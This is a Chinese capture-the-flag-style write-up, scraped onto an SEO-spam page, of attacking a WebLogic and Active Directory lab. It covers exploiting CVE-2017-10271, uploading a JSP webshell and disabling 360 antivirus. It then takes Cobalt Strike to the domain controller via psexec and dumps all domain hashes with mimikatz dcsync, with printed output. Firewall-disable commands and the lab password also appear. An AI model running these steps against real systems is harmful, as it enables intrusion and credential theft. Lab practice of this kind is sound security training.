当前位置: 首页 > wzjs >正文

网站备案在哪个网长沙疫情最新消息今天封城了

网站备案在哪个网,长沙疫情最新消息今天封城了,建设部网站王尚春,上海建站模板系统靶场搭建 新增VMnet2网卡 **web:**需要配置两张网卡,分别是外网出访NAT模式和内网域环境仅主机模式下的VMnet2网卡。 **PC:**跟web一样,也是需要配置两张网卡,分别是外网出访NAT模式和内网域环境仅主机模式下的VMn…

image.png

靶场搭建

新增VMnet2网卡
image.png
**web:**需要配置两张网卡,分别是外网出访NAT模式和内网域环境仅主机模式下的VMnet2网卡。
image.png

**PC:**跟web一样,也是需要配置两张网卡,分别是外网出访NAT模式和内网域环境仅主机模式下的VMnet2网卡。
image.png
**DC:**只是内网网段,所以只需配置仅主机模式
image.png
靶场的web和pc网关是192.168.111.1,网关设置为192.168.111.2,需要把外网nat网关改为.2。

账号:administrator

密码:1qaz@WSX
image.png
image.png

在web服务器上启动weblogic服务,用管理员权限administrator/1qaz@WSX打开startweblogic。
使用管理员模式依次执行脚本
路径C:\Oracle\Middleware\user_projects\domains\base_domain\bin
image.png

浏览器访问http://192.168.111.80:7001,看到Error 404即启动成功,靶场搭建完成。
Weblogic登录界面:http://192.168.111.80:7001/console

至此,环境搭建完成

外网探测

Oracle WebLogic Server的登录页面
image.png
系统版本:
WebLogic Server 版本: 10.3.6.0

思路:测试弱口令,测试SQL,找历史版本CVE打,抓包分析

弱口令没有成功
尝试sqlmap没有成功

python sqlmap.py -r F:\1.txt -p j_password --dbs

尝试找历史CVE打:weblogic_10.3.6_unserialize _CVE-2017-10271

在这之前,先进行一下简单的目录扫描和端口扫描

nmap -Pn -sT 192.168.111.80
dirsearch -u http://192.168.111.80:7001/

image.png

使用weblogic漏洞扫描工具打CVE

验证存在漏洞
image.png

发现可以任意命令执行,且为administrator用户权限
image.png

思路:
这里我注意到网页的url可以查看图片位置,在这里或许可以尝试上传图片马

image.png

上传shell
image.png
但是并没有上传成功
image.png
查阅后,可以通过上传jsp马拿shell
尝试访问http://192.168.111.80:7001/uddiexplorer/
右上角图片新建窗口打开,复制url

http://192.168.111.80:7001/uddiexplorer/oracle_logo.gif

image.png
复制图片文件名,在weblogic中查找位置:

find / -name "oracle_logo.gif" 

利用失败,windows系统,尝试使用windows命令搜索(我犯病了,自己搭的windows靶机用Linux命令………………)

dir /s /b oracle_logo.gif

找到文件位置:
image.png

C:\Oracle\Middleware\user_projects\domains\base_domain\servers\AdminServer\tmp\_WL_internal\uddiexplorer\5f6ebw\war\oracle_logo.gif

尝试在这个路径下上传木马
image.png

显示空白,上传成功!
image.png

尝试远程连接,连接失败,尝试哥斯拉上传jsp木马
生成jsp木马:
image.png
image.png

上传成功,尝试godzilla远程连接
image.png

连接成功!:
image.png

至此,拿到入口机shell

打入内网

已经拿到shell
这里乱码问题没解决,用蚁剑连接(最后还是用哥斯拉上传的jsp木马用蚁剑连接)
image.png

但是无法执行net view ,可能现在拿到的不是域内用户
执行ipconfig /all
可以发现主机有俩张网卡,10.10.10.0/24可能是域内网段
image.png

查看进程,可以发现有360的杀毒软件(这里免杀没学会,直接关掉杀毒软件了……)
image.png

上线CS

这里看到上线的用户为Administrator,并非域内用户。
image.png
尝试用梼杌插件提权

ae614a64356919c925812b7d5c4b6dc.png

提权成功,扫描内网:

ipconfig /all            #查看域,及域内网段
tasklist /svc            #查看进程,检测是否有防火墙
net view                 # 查看局域网内其他主机名
net config Workstation   # 查看计算机名、全名、用户名、系统版本、工作站、域、登录域
net user                 # 查看本机用户列表
net user /domain         # 查看域用户
net localgroup administrators # 查看本地管理员组(通常会有域用户)
net view /domain         # 查看有几个域
net user 用户名 /domain   # 获取指定域用户的信息
net group /domain        # 查看域里面的工作组,查看把用户分了多少组(只能在域控上操作)
net group 组名 /domain    # 查看域中某工作组
net group "domain admins" /domain  # 查看域管理员的名字
net group "domain computers" /domain  # 查看域中的其他主机名
net group "domain controllers" /domain  # 查看域控制器主机名(可能有多台)

image.png

域内用户:“Administrator”“de1ay”“Guest”“krbtgt”“mssql”
image.png

这里看到域中除了域控DC还有PC和已经拿到的WEB机器
image.png

查看域控制器
image.png

信息收集:
内网网段:10.10.10.0/24
外网网段:192.168.111.0/24
域控名:DC
内网机器:PC,WEB

探测域控

Fscan:

fscan -h 10.10.10.0/24 -np -nopoc -nobr探测内网网段:./fscan -h 10.10.10.0/24 -np -nopoc -nobr -p 

image.png

信息收集:
PC:外网ip:192.168.111.201内网ip:10.10.10.201
DC:10.10.10.10

DC端口探测:

fscan -h 10.10.10.10 -p 21,22,80,88,135,139,389,443,445,636,1433,3306,3389,5985,6379

image.png

信息收集:
DC开放端口:88,135,139,389,445,636,3389,5985

横向移动

拿下域控

SMB Beacon:

SMB Beacon使用命名管道通过父级Beacon进行通讯,当两个Beacons链接后,子Beacon从父Beacon获取到任务并发送。因为链接的Beacons使用Windows命名管道进行通信,此流量封装在SMB协议中,所以SMB beacon相对隐蔽。SMB beacon不能直接生成可用载荷, 只能使用 psexec 或 Stageless Payload 上线

使用 smb beacon,由一台已经拿到 beacon 的机器,抓取密码后进行smb喷射,得到另一台开放445端口的机器上的administrator账户密码,在目标机器不出网的情况下,可以使用smb beacon使目标主机上线。

简略原理:

假设有三个主机 a b c,我们的C2是a且我们已经有了b的权限,b可以访问c,c也可以访问b但不能访问a
这时候我们就可以使用smb beacon 然主机C上线。(前提是有主机C的账号密码)

使用条件:

- 具有 Beacon 的主机必须接受 445 端口上的连接。
- 只能链接由同一个 Cobalt Strike 实例管理的 Beacon。
- 必须有目标主机的管理员权限或者说是拥有具有管理员权限的凭据。

使用portscan扫描一下内网
image.png

显示targets列表
image.png

新建beacon SMB监听器
image.png

使用psexec上线域控:

46fd163c0066525e084f664b76144c41.png
解释一下我对上面realm的理解:

google:在 Web 安全中,Realm通常指的是一种保护区域,用于区分不同的安全域或资源。
DESKTOP-LANDMRU:独立计算机,不属于任何域,这里应该指PC
WEB:WEB的账户
de1ay.com和de1ay这里我不太清楚,可能是登录域内的机器

image.png

获取ntds.dit文件

在线破解:前提是有管理员权限。

Mimikatz有一个功能(dcsync),它可以利用目录复制服务(Directory Replication Service, DRS)从NTDS.DIT文件中提取密码哈希值。可以通过dcsync直接获取test域内所有用户hash
lsadump::dcsync /domain:de1ay.com /all /csv也可以获取单个用户的详细信息  
lsadump::dcsync /domain:de1ay.com /user:kertgt可以查看所有用户的所有详细信息  
lsadump::lsa /inject
beacon> mimikatz lsadump::dcsync /domain:de1ay.com /all /csv
[*] Tasked beacon to run mimikatz's lsadump::dcsync /domain:de1ay.com /all /csv command
[+] host called home, sent: 813886 bytes
[+] received output:
[DC] 'de1ay.com' will be the domain
[DC] 'DC.de1ay.com' will be the DC server
[DC] Exporting domain 'de1ay.com'
[rpc] Service  : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
502	krbtgt	82dfc71b72a11ef37d663047bc2088fb	514
1002	DC$	39d74ac4cdd07a6b0855df6e37b6e815	532480
2103	mssql	161cff084477fe596a5db81874498a24	66048
1001	de1ay	161cff084477fe596a5db81874498a24	66048
1603	WEB$	57e157ab6f45290ad8205651dbd27dcb	4096
1105	PC$	ea6b2055e2f4a1c5fc42058fbfc4b2d5	4096
500	Administrator	161cff084477fe596a5db81874498a24	512

总结与反思:

1.有没有方法做免杀绕过360
2.关于关闭防火墙的命令:

shell netsh advfirewall show all state  		  //查看防火墙状态
shell netsh advfirewall set allprofile state off  //关闭防火墙
http://www.dtcms.com/wzjs/52549.html

相关文章:

  • 中国建设网站官方网站花都网络推广seo公司
  • 做美女网站违法不啊免费广告投放平台
  • 国家建设部网站官网证件查询河北百度seo
  • 织梦网站图片怎么做滚动图片百度竞价广告收费标准
  • 动态网站用什么语言做的湖北seo诊断
  • 龙岗网站制作讯息路由优化大师官网
  • 闵行网页设计seo兼职论坛
  • 天津公司建站百度云搜索引擎入口盘搜搜
  • 专门做学校政府的网站it培训班学出来有用吗
  • 东莞微网站制作百度商业平台
  • 做外贸什么网站好软文推广文案
  • 官方网站在家做兼职西安网站托管
  • 哪个网站做攻略比较好sem竞价代运营
  • 营销型网站规划步骤购物网站
  • 织梦软件网站模板下载地址西昌seo快速排名
  • 沙湾网站建设长沙网站优化方法
  • 惠州做网站公司哪家好怎么开发自己的网站
  • b2c网站设计广州网络推广选择
  • 深圳做网站营销策略分析论文
  • 网站内容规范潍坊关键词优化平台
  • 网站建设费怎么入账seo技术网网
  • 简约风格网站建设沈阳专业seo关键词优化
  • 做英文网站挂谷歌广告网站推广怎么推广
  • 淮阴网站建设广东seo快速排名
  • 网站备案好还是不备案好做个网站需要多少钱
  • 免费自助建站系统哪个好关键词推广软件排名
  • app开发外包要多少钱seo做的比较好的公司
  • 网站自创搜索引擎营销实训报告
  • 苏州企业招聘西安百度推广优化公司
  • 福州市城乡建设委员会门户网站房地产估价师考试